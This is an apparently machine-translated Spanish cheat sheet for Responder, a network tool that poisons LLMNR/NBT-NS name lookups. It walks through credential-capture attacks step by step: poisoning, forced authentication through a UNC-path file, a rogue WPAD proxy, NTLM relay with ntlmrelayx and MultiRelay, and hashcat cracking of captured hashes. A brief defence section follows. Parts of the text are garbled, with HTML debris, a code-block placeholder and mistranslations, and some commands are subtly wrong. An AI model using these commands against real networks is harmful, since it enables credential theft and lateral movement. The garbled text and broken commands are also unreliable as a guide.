Responder Cheat Sheet
"Clase de la hoja" id="copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada
Sinopsis
Responder es un potente LLMNR (Resolución de Nombres Multicast de Enlace-Local), NBT-NS (NetBIOS Name Service), y el envenenador MDNS (Multicast DNS). Está diseñado para responder a consultas específicas de resolución de nombres de red e incluye servidores integrados de autenticación HTTP/SMB/MSSQL/FTP/LDAP que apoyan la autenticación NTLMv1/NTLMv2/LMv2.
NOVEDAD Advertencia: El demandado es una herramienta de pruebas de seguridad que sólo debe utilizarse en entornos donde tiene permiso explícito para hacerlo.
Instalación
Kali Linux
# Update package list
sudo apt update
# Install if not already installed
sudo apt install responder
De GitHub
# Clone the repository
git clone https://github.com/lgandx/Responder
# Navigate to the directory
cd Responder
# Make the Python script executable
chmod +x Responder.py
Usando pip
# Install using pip
pip install Responder
Uso básico
Responder inicial
# Basic usage with interface specification
responder -I eth0
# Start with all options enabled
responder -I eth0 -wrf
# Analyze mode (passive)
responder -I eth0 -A
Opciones de línea de mando
| Option | Description |
|---|---|
-h, --help |
Show help message and exit |
-A, --analyze |
Analyze mode. Do not poison any requests, just analyze traffic |
-I <interface> |
Network interface to use |
-i <IP> |
IP address to bind to |
-e <IP> |
External IP address (for DHCP options) |
-b, --basic |
Return a Basic HTTP authentication. Default: NTLM |
-r, --wredir |
Enable answers for netbios wredir suffix queries |
-d, --NBTNSdomain |
Enable answers for netbios domain suffix queries |
-f, --fingerprint |
Fingerprint hosts that issued an NBT-NS or LLMNR query |
-w, --wpad |
Start the WPAD rogue proxy server |
-u, --upstream-proxy |
Upstream HTTP proxy used by the rogue WPAD proxy |
-F, --ForceWpadAuth |
Force NTLM/Basic authentication on wpad.dat file retrieval |
-P, --ProxyAuth |
Force NTLM/Basic authentication for any proxy request |
-lm, --LM |
Force LM hashing downgrade for Windows XP/2003 and earlier |
-v, --verbose |
Increase verbosity |
--log-local |
Log to file in addition to console |
-s, --disable-syslog |
Do not log to syslog |
-S, --disable-stdout |
Do not log to stdout |
-c, --config |
Path to configuration file |
--server=SERVER |
Enable/disable specific server (HTTP, SMB, etc.) |
--sql |
Enable the MSSQL server |
--mssql |
Enable the MSSQL server |
--https |
Enable the HTTPS server |
--http |
Enable the HTTP server |
--smb |
Enable the SMB server |
--ftp |
Enable the FTP server |
--imap |
Enable the IMAP server |
--pop |
Enable the POP server |
--smtp |
Enable the SMTP server |
--ldap |
Enable the LDAP server |
--dns |
Enable the DNS server |
Archivo de configuración
El archivo de configuración se encuentra en __CODE_BLOCK_52_ o en el directorio Responder como Responder.conf.
Opciones de configuración clave
[Responder Core]
; Set to On or Off to enable or disable features
SQL = On
SMB = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
Escenarios de ataque
Envenenamiento básico de LLMNR/NBT-NS
# Start Responder with default settings
responder -I eth0 -v
# Wait for authentication attempts
# Hashes will be saved in the logs directory
Autenticación forzada a través de la UNC Camino
# Create a file with a UNC path
echo "file://<non-existent-share>/test.txt" > malicious.url
# Start Responder
responder -I eth0 -v
# When the victim opens the file, their system will attempt to authenticate
# Responder will capture the hash
WPAD Ataque
# Start Responder with WPAD enabled
responder -I eth0 -w -v
# When a victim's browser requests a WPAD configuration file
# Responder will respond and capture authentication attempts
Relay Attack Setup
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run ntlmrelayx
ntlmrelayx.py -t <target_ip> -smb2support
Hash Capture y Cracking
Ver Hashes capturados
# View captured hashes
cat /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt
# Format of captured hash
# USERNAME::DOMAIN:challenge:NTLM response:other data
Cracking con Hashcat
# Crack NTLMv2 hashes with hashcat
hashcat -m 5600 /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt /path/to/wordlist
# Crack NTLMv1 hashes with hashcat
hashcat -m 5500 /usr/share/responder/logs/SMB-NTLMv1-SSP-<IP>.txt /path/to/wordlist
Técnicas avanzadas
Usando el Responder con MultiRelay
# Start Responder with SMB and HTTP servers disabled
responder -I eth0 -v --disable-http --disable-smb
# In another terminal, run MultiRelay
cd Responder/tools
python3 MultiRelay.py -t <target_ip> -u ALL
Envenenamiento de Hosts Específicos
# Create a file with target IPs
echo "192.168.1.10" > targets.txt
# Start Responder with target file
responder -I eth0 -v -e targets.txt
Valor de desafío personalizado
# Edit Responder.conf and set a custom challenge
# [Responder Core]
# Challenge = 1122334455667788
Medidas de defensa
Disabling LLMNR via Group Policy
- Open Group Policy Editor
- Navega a Configuración de Computación √ Plantillas Administrativas > Red √≥ DNS Cliente
- Activar la resolución de nombres multicast
Disabling NBT-NS via Command Line
# Disable NBT-NS on Windows
netsh interface ipv4 set interface "Local Area Connection" nbtbios=disabled
Disabling NBT-NS via Registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\NodeType = 2 (P-node)
Detectar la actividad del demandado
# Monitor for suspicious LLMNR/NBT-NS responses
# Look for multiple services running on the same IP
# Check for unusual authentication attempts
Solución de problemas
Cuestiones comunes
- ** Conflictos de Puertos** ```bash # Check if ports are already in use netstat -tuln|grep -E '445|80|53'
# Kill conflicting processes
sudo kill
-
Interface Not Found**
```bash # List available interfaces ip a
# Use the correct interface name
responder -I
-
** Cuestiones de misión**
bash # Run with sudo sudo responder -I eth0 -
Ningún Hashes Captured
bash # Check if Responder is running in analyze mode # Ensure the network allows the required traffic # Try forcing authentication with UNC paths
Recursos
- Repositorio oficial de GitHub
- MITRE ATT limitadaCK - LLMNR/NBT-NS Poisoning
- Kali Linux Tools - Responder
-...
*Esta hoja de trampa proporciona una referencia completa para el uso de Responder en escenarios de pruebas de seguridad. Siempre asegúrese de tener una autorización adecuada antes de usar esta herramienta en cualquier entorno. *